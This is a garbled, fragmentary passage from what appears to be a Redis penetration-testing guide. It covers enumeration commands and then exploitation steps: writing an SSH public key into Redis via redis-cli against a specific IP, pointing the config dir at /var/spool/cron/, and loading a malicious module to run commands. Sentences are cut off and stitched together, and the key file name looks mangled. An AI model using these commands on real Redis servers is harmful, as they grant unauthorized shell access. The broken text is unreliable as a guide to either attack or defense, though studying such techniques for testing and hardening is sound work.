nc or you could also use
info. It may return output with information about the Redis instance, or something like the following is returned:
requirepass or temporary until the service restarts, by connecting to it and running:
config set requirepass p@ss$12E45. Also, a username can be configured in the parameter
masteruser inside the redis.conf file.
monitor or get the top 25 slowest queries with
slowlog get 25
info inside the "Keyspace" chunk:
-WRONGTYPE Operation against a key holding the wrong kind of value while running
GET <KEY> it's because the key may be something other than a string or an integer and requires a special operator to display it.
TYPE command, example below for list and hash keys.
config get dir result can be changed after other manual exploit commands. It is suggested to run it first, right after logging into Redis. In the output of
config get dir you could find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh), and knowing this you know where you can write the
authenticated_users file to access via ssh with the user redis. If you know the home of another valid user where you have write permissions you can also abuse it:
ssh-keygen -t rsa
(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
redis-cli -h 10.85.0.52 config set dir /var/spool/cron/
MODULE LOAD /path/to/mymodule.so
MODULE UNLOAD mymodule
whoami and send back the output via
git scheme and not with the